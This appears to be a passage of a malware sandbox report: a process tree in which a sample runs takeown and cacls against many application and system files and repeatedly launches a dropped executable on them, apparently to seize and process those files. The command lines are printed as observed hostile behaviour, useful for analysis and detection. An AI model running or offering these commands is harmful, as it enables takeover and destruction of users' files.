PID:4756

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
1⤵
PID:4264

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
1⤵
- Modifies file permissions
PID:4428

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
1⤵
PID:4492

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
1⤵
PID:2748

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui" /E /G Admin:F /C
1⤵
PID:5068

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui"
1⤵
- Modifies file permissions
PID:3900
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
  2⤵
  PID:380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Genko_1.jtp" -nobanner
1⤵
- Loads dropped DLL
PID:2360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
- Loads dropped DLL
PID:2736

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:600

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
1⤵
PID:2904

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
1⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1884

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
1⤵
PID:4580
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
  2⤵
  PID:1172
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:4528

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner
1⤵
PID:2672

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"
1⤵
PID:3164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner
  2⤵
  PID:2872
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:240

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner
1⤵
PID:1668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner
1⤵
PID:1844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "usa.fca" -nobanner
  2⤵
  PID:2752
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:2464
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:2352
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
  2⤵
  PID:3948
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
  2⤵
  PID:2968

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner
1⤵
PID:1464

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner
1⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1208

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "Graph.jtp" -nobanner
1⤵
PID:492

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
PID:4312

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
PID:3288
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
  2⤵
  PID:1684
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"
    3⤵
    - Modifies file permissions
    PID:3772
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:3360
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui"
      4⤵
      PID:4052
    - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
        
        3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
        5⤵
        
        PID:1588
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui" /E /G Admin:F /C
      4⤵
      PID:1800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:3360

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
1⤵
PID:228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "AGMGPUOptIn.ini" -nobanner
1⤵
PID:4700

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
1⤵
PID:4368

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
1⤵
PID:4600
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "SY______.PFB" -nobanner
  2⤵
  PID:2776

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:988

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
1⤵
PID:4248

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "server_lg.gif" -nobanner
1⤵
PID:4864
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "distribute_form.gif" -nobanner
  2⤵
  PID:4796

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "email_all.gif" -nobanner
1⤵
PID:3912

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MyriadPro-Bold.otf" -nobanner
1⤵
PID:1728

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2724
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
  2⤵
  PID:2676

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
1⤵
PID:3016

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
- Executes dropped EXE
PID:1464

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:892

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
1⤵
PID:944
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui"
  2⤵
  PID:2884
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:2608

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
1⤵
- Modifies file permissions
PID:3772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner
  2⤵
  PID:216

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
1⤵
- Modifies file permissions
PID:4092

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ICELAND.TXT" -nobanner
1⤵
PID:4288
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "forms_received.gif" -nobanner
  2⤵
  PID:4304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
  2⤵
  PID:4292
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:4276
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
  2⤵
  PID:4868
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
  2⤵
  PID:4888

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
1⤵
PID:4704

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
1⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2700

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
1⤵
PID:4812
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "rss.gif" -nobanner
  2⤵
  PID:3480
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
  2⤵
  PID:4396
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
  2⤵
  PID:5104

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
1⤵
PID:4928

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
1⤵
PID:3296

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:3836

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
1⤵
PID:2704

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
1⤵
PID:3152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Workflow.Targets" -nobanner
1⤵
PID:1212

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui"
1⤵
- Modifies file permissions
PID:2260

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner
1⤵
PID:1472

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\ja-JP\jnwmon.dll.mui" /E /G Admin:F /C
1⤵
PID:3664
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
  2⤵
  PID:912
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "CP1251.TXT" -nobanner
  2⤵
  PID:2728

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Dotted_Line.jtp" -nobanner
1⤵
PID:1940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
  2⤵
  PID:3644
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:4696

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C
1⤵
- Loads dropped DLL
PID:4204

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:960

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
1⤵
- Modifies file permissions
PID:3236

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:3180
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "watermark.png" -nobanner
  2⤵
  PID:4464

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2964

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
1⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MinionPro-Regular.otf" -nobanner
1⤵
PID:4460

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
1⤵
PID:2700

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
1⤵
PID:2824

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
1⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "usa03.ths" -nobanner
1⤵
PID:2692

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
1⤵
PID:3268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CROATIAN.TXT" -nobanner
1⤵
PID:3048
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "zy______.pfm" -nobanner
  2⤵
  PID:3988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    PID:3912
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:1760
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:108

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3984

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui"
1⤵
PID:2292
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "can.hyp" -nobanner
  2⤵
  PID:3144
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:2988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "end_review.gif" -nobanner
  2⤵
  PID:2168
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
  2⤵
  PID:1140
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
  2⤵
  PID:1128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "wab.exe" -nobanner
1⤵
PID:1388
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
  2⤵
  PID:2772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:2756

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2600
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
  2⤵
  PID:1720
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:1132
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:3016
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:788
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
      4⤵
      PID:2944
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
      4⤵
      PID:2932
    - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
        
        3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
        5⤵
        
        PID:2600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner
1⤵
PID:4572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner
1⤵
PID:4556

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui"
1⤵
PID:3312

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\Journal.exe"
1⤵
PID:3000
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui"
  2⤵
  PID:2108

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui"
1⤵
- Modifies file permissions
PID:2300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:4464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe" -nobanner
1⤵
PID:4252
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
  2⤵
  PID:3616

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3172

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "open_original_form.gif" -nobanner
1⤵
PID:4268

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "review_same_reviewers.gif" -nobanner
1⤵
PID:3624

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
1⤵
- Modifies file permissions
PID:4684

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4152

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ReadMe.htm" -nobanner
1⤵
PID:4524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "SY______.PFM" -nobanner
1⤵
PID:2560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
1⤵
PID:5052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
  2⤵
  PID:3428
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1644
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:1500
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
  2⤵
  PID:3668
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
  2⤵
  PID:4916

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "brt55.ths" -nobanner
1⤵
PID:2844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "engphon.env" -nobanner
1⤵
PID:3524
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "engphon.env" -nobanner
  2⤵
  PID:5112

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
1⤵
PID:3964

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "CP1254.TXT" -nobanner
1⤵
PID:964

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
1⤵
PID:3688

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
1⤵
PID:1992

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
PID:2676

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:4556

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner
1⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner
1⤵
PID:3684
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner
  2⤵
  PID:1176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Memo.jtp" -nobanner
1⤵
PID:2532

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
1⤵
PID:412
- C:\Windows\SysWOW64\takeown.exe
